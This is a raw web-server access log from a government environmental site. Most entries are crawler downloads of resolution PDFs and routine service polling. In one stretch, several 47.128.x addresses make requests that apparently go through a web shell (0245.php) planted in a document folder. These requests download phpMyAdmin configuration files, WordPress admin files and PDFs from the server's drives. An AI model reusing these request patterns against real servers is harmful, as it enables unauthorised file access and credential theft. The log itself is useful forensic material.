66.249.66.11 - - [28/Jun/2024:02:56:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0168.pdf HTTP/1.1" 304 -
17.241.227.21 - - [28/Jun/2024:02:56:42 -0500] "GET /secretaria-de-ambiente-recupera-cuatro-animales-silvestres-y-realiza-recorridos-para-identificar-fauna-herida-de-incendios-forestales.html HTTP/1.1" 200 902
66.249.66.12 - - [28/Jun/2024:02:57:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5077.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:02:57:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:02:57:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3217.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:02:57:07 -0500] "GET /BLA/resoluciones/AUTOS%202023/2744.pdf HTTP/1.1" 200 474012
66.249.66.11 - - [28/Jun/2024:02:57:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0584.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:02:57:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1738.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:02:57:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [28/Jun/2024:02:57:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00723.pdf HTTP/1.1" 200 1698575
66.249.66.11 - - [28/Jun/2024:02:57:24 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/9636.pdf HTTP/1.1" 200 392384
66.249.66.12 - - [28/Jun/2024:02:57:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5663.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:02:58:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
3.212.128.62 - - [28/Jun/2024:02:58:04 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.13 - - [28/Jun/2024:02:58:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3263.pdf HTTP/1.1" 304 -
190.24.56.230 - - [28/Jun/2024:02:58:32 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2010%2F HTTP/1.1" 200 1307967
190.24.56.230 - - [28/Jun/2024:02:58:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7452.pdf HTTP/1.1" 200 448058
201.245.192.253 - - [28/Jun/2024:02:58:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.12 - - [28/Jun/2024:02:58:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5438.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:02:58:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1453.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:02:58:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4208.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:02:59:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:02:59:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4521.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:02:59:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [28/Jun/2024:02:59:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1554.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:02:59:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0166.pdf HTTP/1.1" 304 -
31.148.131.69 - - [28/Jun/2024:02:59:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3816.pdf HTTP/1.1" 200 351135
66.249.66.11 - - [28/Jun/2024:02:59:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0890.pdf HTTP/1.1" 304 -
216.245.221.92 - - [28/Jun/2024:02:59:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Jun/2024:02:58:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:03:00:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:03:00:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5370.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:00:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3708.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:00:21 -0500] "GET /BLA/resoluciones/AUTOS%202023/07028.pdf HTTP/1.1" 200 394477
66.249.66.11 - - [28/Jun/2024:03:00:21 -0500] "GET /BLA/resoluciones/AUTOS%202023/2541.pdf HTTP/1.1" 200 1778400
66.249.66.11 - - [28/Jun/2024:03:00:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0443.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:00:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1838.pdf HTTP/1.1" 200 280181
66.249.66.12 - - [28/Jun/2024:03:00:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1590.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:03:00:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0059.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:00:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00373.pdf HTTP/1.1" 200 345227
66.249.66.12 - - [28/Jun/2024:03:00:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201301-1350/RESOLUCION%201039%20DE%202002.pdf HTTP/1.1" 200 355193
66.249.66.11 - - [28/Jun/2024:03:00:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4970.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/Jun/2024:02:59:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
66.249.66.11 - - [28/Jun/2024:03:01:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5243.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:03:01:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:03:01:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0224.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:03:01:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5187.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:03:01:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [28/Jun/2024:03:01:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4875.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:03:01:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4382.pdf HTTP/1.1" 304 -
162.55.170.174 - - [28/Jun/2024:03:01:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.66.11 - - [28/Jun/2024:03:01:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5166.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:01:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3723.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:03:02:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:03:02:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5402.pdf HTTP/1.1" 304 -
66.249.66.13 - - [28/Jun/2024:03:02:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4527.pdf HTTP/1.1" 304 -
17.241.227.203 - - [28/Jun/2024:03:02:43 -0500] "GET /centro-vive-jornadas-de-educacion-ambiental-para-la-gestion-adecuada-de-residuos.html HTTP/1.1" 200 870
66.249.66.12 - - [28/Jun/2024:03:02:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3807.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:02:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4613.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:03:03:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
3.20.63.178 - - [28/Jun/2024:03:03:10 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.12 - - [28/Jun/2024:03:03:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4319.pdf HTTP/1.1" 304 -
40.77.167.19 - - [28/Jun/2024:03:03:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0015.pdf HTTP/1.1" 200 119741
201.245.192.253 - - [28/Jun/2024:03:03:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Jun/2024:03:03:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [28/Jun/2024:03:03:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4134.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:03:45 -0500] "GET /BLA/resoluciones/AUTOS%202023/04713.pdf HTTP/1.1" 200 585559
66.249.66.12 - - [28/Jun/2024:03:03:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0463.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:03:04:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:03:04:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3226.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:04:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1144.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:04:12 -0500] "GET /IsolucionSDA/BancoConocimiento/R/Resolucion4287Diciembre29de2007/Resolucion4287Diciembre29de2007.asp HTTP/1.1" 404 5012
66.249.66.11 - - [28/Jun/2024:03:04:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00447.pdf HTTP/1.1" 200 504220
114.119.135.172 - - [28/Jun/2024:03:04:21 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2029/&sort=name&order=asc HTTP/1.1" 200 14353
66.249.66.11 - - [28/Jun/2024:03:04:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0393.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:04:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4199.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:04:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5500.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:04:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1051.pdf HTTP/1.1" 304 -
216.245.221.92 - - [28/Jun/2024:03:04:53 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.163 - - [28/Jun/2024:03:04:58 -0500] "GET /BLA/resoluciones/AUTOS%202022/0985.pdf HTTP/1.1" 200 1957179
66.249.66.11 - - [28/Jun/2024:03:04:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4501.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:03:05:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [28/Jun/2024:03:05:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1161.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:03:05:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [28/Jun/2024:03:05:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4498.pdf HTTP/1.1" 304 -
40.77.167.19 - - [28/Jun/2024:03:05:25 -0500] "GET /BLA/resoluciones/AUTOS%202022/3001.pdf HTTP/1.1" 200 421600
66.249.66.11 - - [28/Jun/2024:03:05:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2222.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:05:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2193.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:05:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5195.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/Jun/2024:03:04:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:03:06:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:03:06:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3266.pdf HTTP/1.1" 304 -
66.249.66.13 - - [28/Jun/2024:03:06:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3053.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:03:06:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2277.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:06:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5040.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/Jun/2024:03:05:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
66.249.66.11 - - [28/Jun/2024:03:07:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1107.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:03:07:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:03:07:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4306.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:07:08 -0500] "GET /BLA/resoluciones/AUTOS%202023/1286.pdf HTTP/1.1" 200 1019907
66.249.66.11 - - [28/Jun/2024:03:07:09 -0500] "GET /BLA/resoluciones/AUTOS%202023/2784.pdf HTTP/1.1" 200 1813049
201.245.192.253 - - [28/Jun/2024:03:07:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
17.241.219.26 - - [28/Jun/2024:03:07:26 -0500] "GET /aves-y-un-marsupial-fueron-liberados-en-el-humedal-guaymaral.html HTTP/1.1" 200 1007
66.249.66.12 - - [28/Jun/2024:03:07:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0982.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:03:07:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4999-.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:07:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00570.pdf HTTP/1.1" 200 7806006
66.249.66.11 - - [28/Jun/2024:03:07:36 -0500] "GET /BLA/resoluciones/AUTOS%202023/2775.pdf HTTP/1.1" 200 2618769
66.249.66.15 - - [28/Jun/2024:03:07:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2722.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:03:07:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5300.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:03:08:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.23.20 - - [28/Jun/2024:03:08:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=vendor_config.php&ft=download HTTP/1.1" 200 2214
3.12.251.153 - - [28/Jun/2024:03:08:16 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.14 - - [28/Jun/2024:03:08:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1891.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:03:08:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5073.pdf HTTP/1.1" 304 -
47.128.30.188 - - [28/Jun/2024:03:08:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0544.pdf&ft=download&white=1 HTTP/1.1" 200 20135
201.245.192.253 - - [28/Jun/2024:03:08:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.52.46 - - [28/Jun/2024:03:08:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cproperties&f=PropertyItem.class.php&ft=download HTTP/1.1" 200 1212
66.249.66.13 - - [28/Jun/2024:03:08:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0983.pdf HTTP/1.1" 304 -
66.249.69.3 - - [28/Jun/2024:03:08:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4552.pdf HTTP/1.1" 304 -
47.128.54.145 - - [28/Jun/2024:03:08:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=List.class.php&ft=download HTTP/1.1" 200 3214
201.245.192.253 - - [28/Jun/2024:03:09:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [28/Jun/2024:03:09:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1164.pdf HTTP/1.1" 304 -
47.128.19.132 - - [28/Jun/2024:03:09:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4162.pdf&ft=download&white=1 HTTP/1.1" 200 347815
201.245.192.253 - - [28/Jun/2024:03:09:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.19.180 - - [28/Jun/2024:03:09:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cconfig%5C&f=FormDisplay.class.php&ft=download HTTP/1.1" 200 27502
66.249.66.13 - - [28/Jun/2024:03:09:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1948.pdf HTTP/1.1" 304 -
47.128.19.176 - - [28/Jun/2024:03:09:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Menu.class.php&ft=download HTTP/1.1" 200 20120
216.245.221.92 - - [28/Jun/2024:03:09:53 -0500] "HEAD / HTTP/1.1" 200 -
47.128.49.181 - - [28/Jun/2024:03:10:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=custom-header.php&ft=download&white=1 HTTP/1.1" 200 43006
201.245.192.253 - - [28/Jun/2024:03:10:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [28/Jun/2024:03:10:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5524.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:10:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0782.pdf HTTP/1.1" 304 -
47.128.19.153 - - [28/Jun/2024:03:10:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4217.pdf&ft=download&white=1 HTTP/1.1" 200 401063
66.249.66.11 - - [28/Jun/2024:03:10:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2577.pdf HTTP/1.1" 304 -
47.128.52.94 - - [28/Jun/2024:03:10:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=Message.class.php&ft=download HTTP/1.1" 200 18915
66.249.66.11 - - [28/Jun/2024:03:10:45 -0500] "GET /BLA/resoluciones/AUTOS%202008/2154.pdf HTTP/1.1" 200 288606
201.245.192.253 - - [28/Jun/2024:03:11:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:03:11:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201701-1750/20021744.tif HTTP/1.1" 200 42886
66.249.66.11 - - [28/Jun/2024:03:11:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1997.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:11:12 -0500] "GET /BLA/resoluciones/AUTOS%202023/05538.pdf HTTP/1.1" 200 1843069
66.249.66.11 - - [28/Jun/2024:03:11:13 -0500] "GET /BLA/resoluciones/AUTOS%202023/05834.pdf HTTP/1.1" 200 397128
201.245.192.253 - - [28/Jun/2024:03:11:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [28/Jun/2024:03:11:33 -0500] "GET /BLA/resoluciones/AUTOS%202023/05853.pdf HTTP/1.1" 200 398001
66.249.66.12 - - [28/Jun/2024:03:11:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00163.pdf HTTP/1.1" 200 3181801
172.22.2.4 - - [28/Jun/2024:03:10:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:03:12:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [28/Jun/2024:03:12:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0228.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:03:12:28 -0500] "GET /BLA/resoluciones/AUTOS%202020/2658.pdf HTTP/1.1" 200 375182
172.22.2.4 - - [28/Jun/2024:03:10:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
66.249.66.11 - - [28/Jun/2024:03:12:34 -0500] "GET /isolucionsda/FrameSetArticulo.asp?Pagina=/isolucionsda/BancoConocimiento/L/Ley1382deFebrero9de2010/Ley1382deFebrero9de2010.asp?IdArticulo=2166 HTTP/1.1" 200 527
216.244.66.195 - - [28/Jun/2024:03:12:39 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.11 - - [28/Jun/2024:03:12:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2646.pdf HTTP/1.1" 200 218553
66.249.66.11 - - [28/Jun/2024:03:12:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4771.pdf HTTP/1.1" 200 479457
40.77.167.52 - - [28/Jun/2024:03:12:56 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%203%20del%2020%20de%20Mayo%20de%202014.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:03:13:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:03:13:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3945.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:03:13:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
54.167.223.174 - - [28/Jun/2024:03:13:21 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.11 - - [28/Jun/2024:03:13:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5027.pdf HTTP/1.1" 200 336083
201.245.192.253 - - [28/Jun/2024:03:13:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [28/Jun/2024:03:13:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/0718.pdf HTTP/1.1" 200 171332
201.245.192.253 - - [28/Jun/2024:03:14:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [28/Jun/2024:03:14:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5512.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:14:14 -0500] "GET /BLA/resoluciones/AUTOS%202023/2517.pdf HTTP/1.1" 200 1898942
66.249.66.11 - - [28/Jun/2024:03:14:14 -0500] "GET /BLA/resoluciones/AUTOS%202023/4097.pdf HTTP/1.1" 200 3477987
66.249.66.11 - - [28/Jun/2024:03:14:15 -0500] "GET /BLA/resoluciones/AUTOS%202023/3358.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:03:14:21 -0500] "GET /autoliquidacion/Solicitud%20de%20expedici%C3%B3n%20de%20certificados%20de%20estado%20de%20conservaci%C3%B3n%20ambiental%20(CECA)/Circular%20tramite%20CECA.pdf HTTP/1.1" 200 168662
66.249.66.11 - - [28/Jun/2024:03:14:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4308.pdf HTTP/1.1" 200 358938
66.249.66.12 - - [28/Jun/2024:03:14:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00385.pdf HTTP/1.1" 200 537637
66.249.66.14 - - [28/Jun/2024:03:14:35 -0500] "GET /BLA/resoluciones/AUTOS%202023/5844.pdf HTTP/1.1" 200 397889
216.245.221.92 - - [28/Jun/2024:03:14:53 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.13 - - [28/Jun/2024:03:15:03 -0500] "GET /autoliquidacion/Solicitud%20de%20expedici%C3%B3n%20de%20certificados%20de%20estado%20de%20conservaci%C3%B3n%20ambiental%20(CECA)/Formulario%20de%20solicitud%20CECA%202021.pdf HTTP/1.1" 200 517926
201.245.192.253 - - [28/Jun/2024:03:15:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [28/Jun/2024:03:15:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3793.pdf HTTP/1.1" 200 377088
201.245.192.253 - - [28/Jun/2024:03:15:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [28/Jun/2024:03:15:21 -0500] "GET /Publicaciones/2024EE121332.pdf HTTP/1.1" 404 228
201.245.192.253 - - [28/Jun/2024:03:16:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [28/Jun/2024:03:16:21 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20C-554%20DE%202007.doc HTTP/1.1" 200 35328
66.249.66.11 - - [28/Jun/2024:03:16:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0064.pdf HTTP/1.1" 200 226408
66.249.66.11 - - [28/Jun/2024:03:17:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1156.pdf HTTP/1.1" 200 461558
201.245.192.253 - - [28/Jun/2024:03:17:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:03:17:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36693
